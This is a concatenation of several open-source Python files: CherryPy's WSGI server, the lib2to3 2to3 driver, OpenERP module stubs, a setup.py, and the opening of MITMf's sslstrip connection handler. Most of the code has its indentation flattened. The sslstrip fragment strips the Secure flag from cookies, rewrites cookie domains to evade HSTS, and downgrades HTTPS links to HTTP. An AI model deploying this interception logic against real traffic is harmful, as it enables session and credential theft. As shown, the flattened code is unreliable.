"to listen on all active interfaces.")
self._bind_addr = value
bind_addr = property(_get_bind_addr, _set_bind_addr,
doc="""The interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any IPv4
or IPv6 address, or any valid hostname. The string 'localhost' is a
synonym for '127.0.0.1' (or '::1', if your hosts file prefers IPv6).
The string '0.0.0.0' is a special IPv4 entry meaning "any active
interface" (INADDR_ANY), and '::' is the similar IN6ADDR_ANY for
IPv6. The empty string or None are not allowed.
For UNIX sockets, supply the filename as a string.""")
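    # Illustrative values (assumed examples): ('0.0.0.0', 8080) listens on all
    # IPv4 interfaces, ('::', 8080) on all IPv6 interfaces, and a string such
    # as '/tmp/cp.sock' requests an AF_UNIX socket.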
def start(self):
"""Run the server forever."""
# We don't have to trap KeyboardInterrupt or SystemExit here,
        # because cherrypy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self._interrupt = None
if self.software is None:
self.software = "%s Server" % self.version
# SSL backward compatibility
if (self.ssl_adapter is None and
getattr(self, 'ssl_certificate', None) and
getattr(self, 'ssl_private_key', None)):
warnings.warn(
"SSL attributes are deprecated in CherryPy 3.2, and will "
"be removed in CherryPy 3.3. Use an ssl_adapter attribute "
"instead.",
DeprecationWarning
)
try:
from cherrypy.wsgiserver.ssl_pyopenssl import pyOpenSSLAdapter
except ImportError:
pass
else:
self.ssl_adapter = pyOpenSSLAdapter(
self.ssl_certificate, self.ssl_private_key,
getattr(self, 'ssl_certificate_chain', None))
# Select the appropriate socket
if isinstance(self.bind_addr, basestring):
# AF_UNIX socket
# So we can reuse the socket...
try: os.unlink(self.bind_addr)
except: pass
# So everyone can access the socket...
try: os.chmod(self.bind_addr, 511) # 0777
except: pass
info = [(socket.AF_UNIX, socket.SOCK_STREAM, 0, "", self.bind_addr)]
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6 addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE)
except socket.gaierror:
if ':' in self.bind_addr[0]:
info = [(socket.AF_INET6, socket.SOCK_STREAM,
0, "", self.bind_addr + (0, 0))]
else:
info = [(socket.AF_INET, socket.SOCK_STREAM,
0, "", self.bind_addr)]
self.socket = None
msg = "No socket could be created"
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
except socket.error:
if self.socket:
self.socket.close()
self.socket = None
continue
break
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.error_log("Error in HTTPServer.tick", level=logging.ERROR,
traceback=True)
if self.interrupt:
while self.interrupt is True:
# Wait for self.stop() to complete. See _set_interrupt.
time.sleep(0.1)
if self.interrupt:
raise self.interrupt
def error_log(self, msg="", level=20, traceback=False):
# Override this in subclasses as desired
sys.stderr.write(msg + '\n')
sys.stderr.flush()
if traceback:
tblines = format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
self.socket = socket.socket(family, type, proto)
prevent_socket_inheritance(self.socket)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.nodelay and not isinstance(self.bind_addr, str):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self.ssl_adapter is not None:
self.socket = self.ssl_adapter.bind(self.socket)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See http://www.cherrypy.org/ticket/871.
if (hasattr(socket, 'AF_INET6') and family == socket.AF_INET6
and self.bind_addr[0] in ('::', '::0', '::0.0.0.0')):
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
self.socket.bind(self.bind_addr)
def tick(self):
"""Accept a new connection and put it on the Queue."""
try:
s, addr = self.socket.accept()
if self.stats['Enabled']:
self.stats['Accepts'] += 1
if not self.ready:
return
prevent_socket_inheritance(s)
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
makefile = CP_fileobject
ssl_env = {}
# if ssl cert and key are set, we try to be a secure HTTP server
if self.ssl_adapter is not None:
try:
s, ssl_env = self.ssl_adapter.wrap(s)
except NoSSLError:
msg = ("The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
buf = ["%s 400 Bad Request\r\n" % self.protocol,
"Content-Length: %s\r\n" % len(msg),
"Content-Type: text/plain\r\n\r\n",
msg]
wfile = makefile(s, "wb", DEFAULT_BUFFER_SIZE)
try:
wfile.sendall("".join(buf))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return
if not s:
return
makefile = self.ssl_adapter.makefile
# Re-apply our timeout since we may have a new socket object
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
conn = self.ConnectionClass(self, s, makefile)
if not isinstance(self.bind_addr, basestring):
# optional values
# Until we do DNS lookups, omit REMOTE_HOST
if addr is None: # sometimes this can happen
# figure out if AF_INET or AF_INET6.
if len(s.getsockname()) == 2:
# AF_INET
addr = ('0.0.0.0', 0)
else:
# AF_INET6
addr = ('::', 0)
conn.remote_addr = addr[0]
conn.remote_port = addr[1]
conn.ssl_env = ssl_env
self.requests.put(conn)
except socket.timeout:
# The only reason for the timeout in start() is so we can
# notice keyboard interrupts on Win32, which don't interrupt
# accept() by default
return
except socket.error:
x = sys.exc_info()[1]
if self.stats['Enabled']:
self.stats['Socket Errors'] += 1
if x.args[0] in socket_error_eintr:
# I *think* this is right. EINTR should occur when a signal
# is received during the accept() call; all docs say retry
# the call, and I *think* I'm reading it right that Python
# will then go ahead and poll for and handle the signal
# elsewhere. See http://www.cherrypy.org/ticket/707.
return
if x.args[0] in socket_errors_nonblocking:
# Just try again. See http://www.cherrypy.org/ticket/479.
return
if x.args[0] in socket_errors_to_ignore:
# Our socket was closed.
# See http://www.cherrypy.org/ticket/686.
return
raise
def _get_interrupt(self):
return self._interrupt
def _set_interrupt(self, interrupt):
self._interrupt = True
self.stop()
self._interrupt = interrupt
interrupt = property(_get_interrupt, _set_interrupt,
doc="Set this to an Exception instance to "
"interrupt the server.")
def stop(self):
"""Gracefully shutdown a server that is serving forever."""
self.ready = False
if self._start_time is not None:
self._run_time += (time.time() - self._start_time)
self._start_time = None
sock = getattr(self, "socket", None)
if sock:
if not isinstance(self.bind_addr, basestring):
# Touch our own socket to make accept() return immediately.
try:
host, port = sock.getsockname()[:2]
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
# Changed to use error code and not message
# See http://www.cherrypy.org/ticket/860.
raise
else:
# Note that we're explicitly NOT using AI_PASSIVE,
# here, because we want an actual IP to touch.
# localhost won't work if we've bound to a public IP,
# but it will if we bound to '0.0.0.0' (INADDR_ANY).
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
if hasattr(sock, "close"):
sock.close()
self.socket = None
self.requests.stop(self.shutdown_timeout)
class Gateway(object):
"""A base class to interface HTTPServer with other systems, such as WSGI."""
def __init__(self, req):
self.req = req
def respond(self):
"""Process the current request. Must be overridden in a subclass."""
        raise NotImplementedError
# These may either be wsgiserver.SSLAdapter subclasses or the string names
# of such classes (in which case they will be lazily loaded).
ssl_adapters = {
'builtin': 'cherrypy.wsgiserver.ssl_builtin.BuiltinSSLAdapter',
'pyopenssl': 'cherrypy.wsgiserver.ssl_pyopenssl.pyOpenSSLAdapter',
}
def get_ssl_adapter_class(name='pyopenssl'):
"""Return an SSL adapter class for the given name."""
adapter = ssl_adapters[name.lower()]
if isinstance(adapter, basestring):
last_dot = adapter.rfind(".")
attr_name = adapter[last_dot + 1:]
mod_path = adapter[:last_dot]
try:
mod = sys.modules[mod_path]
if mod is None:
raise KeyError()
except KeyError:
# The last [''] is important.
mod = __import__(mod_path, globals(), locals(), [''])
# Let an AttributeError propagate outward.
try:
adapter = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
return adapter
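# Illustrative usage (assumed example; the certificate file names are made up):
#
#     adapter_cls = get_ssl_adapter_class('builtin')
#     server.ssl_adapter = adapter_cls('cert.pem', 'key.pem')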
# -------------------------------- WSGI Stuff -------------------------------- #
class CherryPyWSGIServer(HTTPServer):
"""A subclass of HTTPServer which calls a WSGI application."""
wsgi_version = (1, 0)
"""The version of WSGI to produce."""
def __init__(self, bind_addr, wsgi_app, numthreads=10, server_name=None,
max=-1, request_queue_size=5, timeout=10, shutdown_timeout=5):
self.requests = ThreadPool(self, min=numthreads or 1, max=max)
self.wsgi_app = wsgi_app
self.gateway = wsgi_gateways[self.wsgi_version]
self.bind_addr = bind_addr
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.request_queue_size = request_queue_size
self.timeout = timeout
self.shutdown_timeout = shutdown_timeout
self.clear_stats()
def _get_numthreads(self):
return self.requests.min
def _set_numthreads(self, value):
self.requests.min = value
numthreads = property(_get_numthreads, _set_numthreads)
class WSGIGateway(Gateway):
"""A base class to interface HTTPServer with WSGI."""
def __init__(self, req):
self.req = req
self.started_response = False
self.env = self.get_environ()
self.remaining_bytes_out = None
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
        raise NotImplementedError
def respond(self):
"""Process the current request."""
response = self.req.server.wsgi_app(self.env, self.start_response)
try:
for chunk in response:
# "The start_response callable must not actually transmit
# the response headers. Instead, it must store them for the
# server or gateway to transmit only after the first
# iteration of the application return value that yields
# a NON-EMPTY string, or upon the application's first
# invocation of the write() callable." (PEP 333)
if chunk:
if isinstance(chunk, unicodestr):
chunk = chunk.encode('ISO-8859-1')
self.write(chunk)
finally:
if hasattr(response, "close"):
response.close()
def start_response(self, status, headers, exc_info = None):
"""WSGI callable to begin the HTTP response."""
# "The application may call start_response more than once,
# if and only if the exc_info argument is provided."
if self.started_response and not exc_info:
raise AssertionError("WSGI start_response called a second "
"time with no exc_info.")
self.started_response = True
# "if exc_info is provided, and the HTTP headers have already been
# sent, start_response must raise an error, and should raise the
# exc_info tuple."
if self.req.sent_headers:
try:
raise exc_info[0], exc_info[1], exc_info[2]
finally:
exc_info = None
self.req.status = status
for k, v in headers:
if not isinstance(k, str):
raise TypeError("WSGI response header key %r is not of type str." % k)
if not isinstance(v, str):
raise TypeError("WSGI response header value %r is not of type str." % v)
if k.lower() == 'content-length':
self.remaining_bytes_out = int(v)
self.req.outheaders.extend(headers)
return self.write
def write(self, chunk):
"""WSGI callable to write unbuffered data to the client.
This method is also used internally by start_response (to write
data from the iterable returned by the WSGI application).
"""
if not self.started_response:
raise AssertionError("WSGI write called before start_response.")
chunklen = len(chunk)
rbo = self.remaining_bytes_out
if rbo is not None and chunklen > rbo:
if not self.req.sent_headers:
# Whew. We can send a 500 to the client.
self.req.simple_response("500 Internal Server Error",
"The requested resource returned more bytes than the "
"declared Content-Length.")
else:
# Dang. We have probably already sent data. Truncate the chunk
# to fit (so the client doesn't hang) and raise an error later.
chunk = chunk[:rbo]
if not self.req.sent_headers:
self.req.sent_headers = True
self.req.send_headers()
self.req.write(chunk)
if rbo is not None:
rbo -= chunklen
if rbo < 0:
raise ValueError(
"Response body exceeds the declared Content-Length.")
class WSGIGateway_10(WSGIGateway):
"""A Gateway class to interface HTTPServer with WSGI 1.0.x."""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env = {
# set a non-standard environ entry so the WSGI app can know what
# the *real* server protocol is (and what features to support).
# See http://www.faqs.org/rfcs/rfc2145.html.
'ACTUAL_SERVER_PROTOCOL': req.server.protocol,
'PATH_INFO': req.path,
'QUERY_STRING': req.qs,
'REMOTE_ADDR': req.conn.remote_addr or '',
'REMOTE_PORT': str(req.conn.remote_port or ''),
'REQUEST_METHOD': req.method,
'REQUEST_URI': req.uri,
'SCRIPT_NAME': '',
'SERVER_NAME': req.server.server_name,
# Bah. "SERVER_PROTOCOL" is actually the REQUEST protocol.
'SERVER_PROTOCOL': req.request_protocol,
'SERVER_SOFTWARE': req.server.software,
'wsgi.errors': sys.stderr,
'wsgi.input': req.rfile,
'wsgi.multiprocess': False,
'wsgi.multithread': True,
'wsgi.run_once': False,
'wsgi.url_scheme': req.scheme,
'wsgi.version': (1, 0),
}
if isinstance(req.server.bind_addr, basestring):
# AF_UNIX. This isn't really allowed by WSGI, which doesn't
# address unix domain sockets. But it's better than nothing.
env["SERVER_PORT"] = ""
else:
env["SERVER_PORT"] = str(req.server.bind_addr[1])
# Request headers
for k, v in req.inheaders.iteritems():
env["HTTP_" + k.upper().replace("-", "_")] = v
# CONTENT_TYPE/CONTENT_LENGTH
ct = env.pop("HTTP_CONTENT_TYPE", None)
if ct is not None:
env["CONTENT_TYPE"] = ct
cl = env.pop("HTTP_CONTENT_LENGTH", None)
if cl is not None:
env["CONTENT_LENGTH"] = cl
if req.conn.ssl_env:
env.update(req.conn.ssl_env)
return env
class WSGIGateway_u0(WSGIGateway_10):
"""A Gateway class to interface HTTPServer with WSGI u.0.
WSGI u.0 is an experimental protocol, which uses unicode for keys and values
in both Python 2 and Python 3.
"""
def get_environ(self):
"""Return a new environ dict targeting the given wsgi.version"""
req = self.req
env_10 = WSGIGateway_10.get_environ(self)
env = dict([(k.decode('ISO-8859-1'), v) for k, v in env_10.iteritems()])
env[u'wsgi.version'] = ('u', 0)
# Request-URI
env.setdefault(u'wsgi.url_encoding', u'utf-8')
try:
for key in [u"PATH_INFO", u"SCRIPT_NAME", u"QUERY_STRING"]:
env[key] = env_10[str(key)].decode(env[u'wsgi.url_encoding'])
except UnicodeDecodeError:
# Fall back to latin 1 so apps can transcode if needed.
env[u'wsgi.url_encoding'] = u'ISO-8859-1'
for key in [u"PATH_INFO", u"SCRIPT_NAME", u"QUERY_STRING"]:
env[key] = env_10[str(key)].decode(env[u'wsgi.url_encoding'])
for k, v in sorted(env.items()):
if isinstance(v, str) and k not in ('REQUEST_URI', 'wsgi.input'):
env[k] = v.decode('ISO-8859-1')
return env
wsgi_gateways = {
(1, 0): WSGIGateway_10,
('u', 0): WSGIGateway_u0,
}
class WSGIPathInfoDispatcher(object):
"""A WSGI dispatcher for dispatch based on the PATH_INFO.
apps: a dict or list of (path_prefix, app) pairs.
"""
def __init__(self, apps):
try:
apps = list(apps.items())
except AttributeError:
pass
# Sort the apps by len(path), descending
apps.sort(cmp=lambda x,y: cmp(len(x[0]), len(y[0])))
apps.reverse()
# The path_prefix strings must start, but not end, with a slash.
# Use "" instead of "/".
self.apps = [(p.rstrip("/"), a) for p, a in apps]
def __call__(self, environ, start_response):
path = environ["PATH_INFO"] or "/"
for p, app in self.apps:
# The apps list should be sorted by length, descending.
if path.startswith(p + "/") or path == p:
environ = environ.copy()
environ["SCRIPT_NAME"] = environ["SCRIPT_NAME"] + p
environ["PATH_INFO"] = path[len(p):]
return app(environ, start_response)
start_response('404 Not Found', [('Content-Type', 'text/plain'),
('Content-Length', '0')])
return ['']
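# Usage sketch (hypothetical app callables, not part of the original module):
#     dispatcher = WSGIPathInfoDispatcher([("/api", api_app), ("", root_app)])
# The dispatcher is itself a WSGI callable, so it can be passed wherever a
# wsgi_app is expected and invoked as dispatcher(environ, start_response).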
| mit |
nicolargo/intellij-community | python/helpers/pydev/third_party/pep8/lib2to3/lib2to3/main.py | 250 | 11605 | """
Main program for 2to3.
"""
from __future__ import with_statement
import sys
import os
import difflib
import logging
import shutil
import optparse
from . import refactor
def diff_texts(a, b, filename):
"""Return a unified diff of two strings."""
a = a.splitlines()
b = b.splitlines()
return difflib.unified_diff(a, b, filename, filename,
"(original)", "(refactored)",
lineterm="")
class StdoutRefactoringTool(refactor.MultiprocessRefactoringTool):
"""
A refactoring tool that can avoid overwriting its input files.
Prints output to stdout.
    Output files can optionally be written to a different directory and/or
have an extra file suffix appended to their name for use in situations
where you do not want to replace the input files.
"""
def __init__(self, fixers, options, explicit, nobackups, show_diffs,
input_base_dir='', output_dir='', append_suffix=''):
"""
Args:
fixers: A list of fixers to import.
options: A dict with RefactoringTool configuration.
            explicit: A list of fixers to run even though they are marked
                explicit (i.e. they only run when requested by name).
nobackups: If true no backup '.bak' files will be created for those
files that are being refactored.
show_diffs: Should diffs of the refactoring be printed to stdout?
input_base_dir: The base directory for all input files. This class
will strip this path prefix off of filenames before substituting
it with output_dir. Only meaningful if output_dir is supplied.
All files processed by refactor() must start with this path.
output_dir: If supplied, all converted files will be written into
this directory tree instead of input_base_dir.
append_suffix: If supplied, all files output by this tool will have
this appended to their filename. Useful for changing .py to
.py3 for example by passing append_suffix='3'.
"""
self.nobackups = nobackups
self.show_diffs = show_diffs
if input_base_dir and not input_base_dir.endswith(os.sep):
input_base_dir += os.sep
self._input_base_dir = input_base_dir
self._output_dir = output_dir
self._append_suffix = append_suffix
super(StdoutRefactoringTool, self).__init__(fixers, options, explicit)
def log_error(self, msg, *args, **kwargs):
self.errors.append((msg, args, kwargs))
self.logger.error(msg, *args, **kwargs)
def write_file(self, new_text, filename, old_text, encoding):
orig_filename = filename
if self._output_dir:
if filename.startswith(self._input_base_dir):
filename = os.path.join(self._output_dir,
filename[len(self._input_base_dir):])
else:
raise ValueError('filename %s does not start with the '
'input_base_dir %s' % (
filename, self._input_base_dir))
if self._append_suffix:
filename += self._append_suffix
if orig_filename != filename:
output_dir = os.path.dirname(filename)
if not os.path.isdir(output_dir):
os.makedirs(output_dir)
self.log_message('Writing converted %s to %s.', orig_filename,
filename)
if not self.nobackups:
# Make backup
backup = filename + ".bak"
if os.path.lexists(backup):
try:
os.remove(backup)
except os.error, err:
self.log_message("Can't remove backup %s", backup)
try:
os.rename(filename, backup)
except os.error, err:
self.log_message("Can't rename %s to %s", filename, backup)
# Actually write the new file
write = super(StdoutRefactoringTool, self).write_file
write(new_text, filename, old_text, encoding)
if not self.nobackups:
shutil.copymode(backup, filename)
if orig_filename != filename:
# Preserve the file mode in the new output directory.
shutil.copymode(orig_filename, filename)
def print_output(self, old, new, filename, equal):
if equal:
self.log_message("No changes to %s", filename)
else:
self.log_message("Refactored %s", filename)
if self.show_diffs:
diff_lines = diff_texts(old, new, filename)
try:
if self.output_lock is not None:
with self.output_lock:
for line in diff_lines:
print line
sys.stdout.flush()
else:
for line in diff_lines:
print line
except UnicodeEncodeError:
warn("couldn't encode %s's diff for your terminal" %
(filename,))
return
def warn(msg):
print >> sys.stderr, "WARNING: %s" % (msg,)
def main(fixer_pkg, args=None):
"""Main program.
Args:
fixer_pkg: the name of a package where the fixers are located.
args: optional; a list of command line arguments. If omitted,
sys.argv[1:] is used.
Returns a suggested exit status (0, 1, 2).
"""
# Set up option parser
parser = optparse.OptionParser(usage="2to3 [options] file|dir ...")
parser.add_option("-d", "--doctests_only", action="store_true",
help="Fix up doctests only")
parser.add_option("-f", "--fix", action="append", default=[],
help="Each FIX specifies a transformation; default: all")
parser.add_option("-j", "--processes", action="store", default=1,
type="int", help="Run 2to3 concurrently")
parser.add_option("-x", "--nofix", action="append", default=[],
help="Prevent a transformation from being run")
parser.add_option("-l", "--list-fixes", action="store_true",
help="List available transformations")
parser.add_option("-p", "--print-function", action="store_true",
help="Modify the grammar so that print() is a function")
parser.add_option("-v", "--verbose", action="store_true",
help="More verbose logging")
parser.add_option("--no-diffs", action="store_true",
help="Don't show diffs of the refactoring")
parser.add_option("-w", "--write", action="store_true",
help="Write back modified files")
parser.add_option("-n", "--nobackups", action="store_true", default=False,
help="Don't write backups for modified files")
parser.add_option("-o", "--output-dir", action="store", type="str",
default="", help="Put output files in this directory "
"instead of overwriting the input files. Requires -n.")
parser.add_option("-W", "--write-unchanged-files", action="store_true",
help="Also write files even if no changes were required"
" (useful with --output-dir); implies -w.")
parser.add_option("--add-suffix", action="store", type="str", default="",
help="Append this string to all output filenames."
" Requires -n if non-empty. "
"ex: --add-suffix='3' will generate .py3 files.")
# Parse command line arguments
refactor_stdin = False
flags = {}
options, args = parser.parse_args(args)
if options.write_unchanged_files:
flags["write_unchanged_files"] = True
if not options.write:
warn("--write-unchanged-files/-W implies -w.")
options.write = True
# If we allowed these, the original files would be renamed to backup names
# but not replaced.
if options.output_dir and not options.nobackups:
parser.error("Can't use --output-dir/-o without -n.")
if options.add_suffix and not options.nobackups:
parser.error("Can't use --add-suffix without -n.")
if not options.write and options.no_diffs:
warn("not writing files and not printing diffs; that's not very useful")
if not options.write and options.nobackups:
parser.error("Can't use -n without -w")
if options.list_fixes:
print "Available transformations for the -f/--fix option:"
for fixname in refactor.get_all_fix_names(fixer_pkg):
print fixname
if not args:
return 0
if not args:
print >> sys.stderr, "At least one file or directory argument required."
print >> sys.stderr, "Use --help to show usage."
return 2
if "-" in args:
refactor_stdin = True
if options.write:
print >> sys.stderr, "Can't write to stdin."
return 2
if options.print_function:
flags["print_function"] = True
# Set up logging handler
level = logging.DEBUG if options.verbose else logging.INFO
logging.basicConfig(format='%(name)s: %(message)s', level=level)
logger = logging.getLogger('lib2to3.main')
# Initialize the refactoring tool
avail_fixes = set(refactor.get_fixers_from_package(fixer_pkg))
unwanted_fixes = set(fixer_pkg + ".fix_" + fix for fix in options.nofix)
explicit = set()
if options.fix:
all_present = False
for fix in options.fix:
if fix == "all":
all_present = True
else:
explicit.add(fixer_pkg + ".fix_" + fix)
requested = avail_fixes.union(explicit) if all_present else explicit
else:
requested = avail_fixes.union(explicit)
fixer_names = requested.difference(unwanted_fixes)
input_base_dir = os.path.commonprefix(args)
if (input_base_dir and not input_base_dir.endswith(os.sep)
and not os.path.isdir(input_base_dir)):
# One or more similar names were passed, their directory is the base.
# os.path.commonprefix() is ignorant of path elements, this corrects
# for that weird API.
input_base_dir = os.path.dirname(input_base_dir)
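    # Illustration (hypothetical paths): os.path.commonprefix() compares
    # character by character, so ['/src/pkg/a.py', '/src/pkg/ab.py'] yields
    # '/src/pkg/a'; that is not a directory, so dirname() trims it to '/src/pkg'.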
if options.output_dir:
input_base_dir = input_base_dir.rstrip(os.sep)
logger.info('Output in %r will mirror the input directory %r layout.',
options.output_dir, input_base_dir)
rt = StdoutRefactoringTool(
sorted(fixer_names), flags, sorted(explicit),
options.nobackups, not options.no_diffs,
input_base_dir=input_base_dir,
output_dir=options.output_dir,
append_suffix=options.add_suffix)
# Refactor all files and directories passed as arguments
if not rt.errors:
if refactor_stdin:
rt.refactor_stdin()
else:
try:
rt.refactor(args, options.write, options.doctests_only,
options.processes)
except refactor.MultiprocessingUnsupported:
assert options.processes > 1
print >> sys.stderr, "Sorry, -j isn't " \
"supported on this platform."
return 1
rt.summarize()
# Return error status (0 if rt.errors is zero)
return int(bool(rt.errors))
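# Typical invocation (hypothetical target file), assuming this module backs the
# standard 2to3 entry point: main("lib2to3.fixes", ["-w", "example.py"]) runs
# the default fixers over example.py and writes the result back, keeping a .bak
# backup unless -n/--nobackups is given.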
| apache-2.0 |
0k/OpenUpgrade | addons/sale_margin/__init__.py | 441 | 1042 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Frzk/Rig | setup.py | 1 | 1377 | #!/usr/bin/env python
# coding: utf-8
import re
from setuptools import setup
# Get version from `ellis/main.py`:
version = re.search('^__version__\s*=\s*"(.*)"',
open('ellis/main.py').read(),
re.M) \
.group(1)
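# Example (hypothetical file contents): if ellis/main.py contains a line such as
# __version__ = "0.1.0", the regex above captures "0.1.0" into `version`.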
setup(name='ellis',
version=version,
description='Ellis monitors systemd-journald and triggers actions.',
url='http://github.com/Frzk/Ellis',
author='François KUBLER',
author_email='[email protected]',
entry_points={
"console_scripts": ['ellis = ellis.main:main']
},
# data_files=[
# ('/usr/lib/systemd/system', ['ellis.service']),
# ],
packages=[
'ellis',
'ellis_actions'
],
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Environment :: Console',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.5',
'Topic :: Security',
'Topic :: Utilities',
'Topic :: System :: Monitoring',
],
install_requires=[
'smtplibaio >= 2.0.1',
'systemd-python >= 231',
])
| gpl-3.0 |
OSSESAC/odoopubarquiluz | addons/portal_project/__openerp__.py | 55 | 1669 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Portal Project',
'version': '0.1',
'category': 'Tools',
'complexity': 'easy',
'description': """
This module adds project menu and features (tasks) to your portal if project and portal are installed.
======================================================================================================
""",
'author': 'OpenERP SA',
'depends': ['project','portal'],
'data': [
'security/portal_security.xml',
'security/ir.model.access.csv',
'portal_project_view.xml',
],
'installable': True,
'auto_install': True,
'category': 'Hidden',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
yesho/MITMf | core/sslstrip/SSLServerConnection.py | 26 | 5607 | # Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import re
import string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [SSLServerConnection] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("SSLServerConnection", formatter)
class SSLServerConnection(ServerConnection):
'''
For SSL connections to a server, we need to do some additional stripping. First we need
to make note of any relative links, as the server will be expecting those to be requested
via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
'''
cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
iconExpression = re.compile(r"<link rel=\"shortcut icon\" .*href=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
headExpression = re.compile(r"<head>", re.IGNORECASE)
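    # Illustration (hypothetical header value): cookieExpression.sub("\g<1>",
    # "sessionid=abc123; Secure") returns "sessionid=abc123", dropping the
    # Secure attribute so the stripped cookie is still sent over plain HTTP.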
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().hsts
def getLogLevel(self):
return logging.INFO
def getPostPrefix(self):
return "SECURE POST"
def handleHeader(self, key, value):
if self.hsts:
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
values = value.split(';')
for v in values:
if v[:7].lower()==' domain':
dominio=v.split("=")[1]
log.debug("Parsing cookie domain parameter: %s"%v)
real = self.urlMonitor.real
if dominio in real:
v=" Domain=%s"%real[dominio]
log.debug("New cookie domain parameter: %s"%v)
newvalues.append(v)
value = ';'.join(newvalues)
if (key.lower() == 'access-control-allow-origin'):
value='*'
else:
if (key.lower() == 'set-cookie'):
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)
ServerConnection.handleHeader(self, key, value)
def stripFileFromPath(self, path):
(strippedPath, lastSlash, file) = path.rpartition('/')
return strippedPath
def buildAbsoluteLink(self, link):
absoluteLink = ""
if ((not link.startswith('http')) and (not link.startswith('/'))):
absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link
log.debug("Found path-relative link in secure transmission: " + link)
log.debug("New Absolute path-relative link: " + absoluteLink)
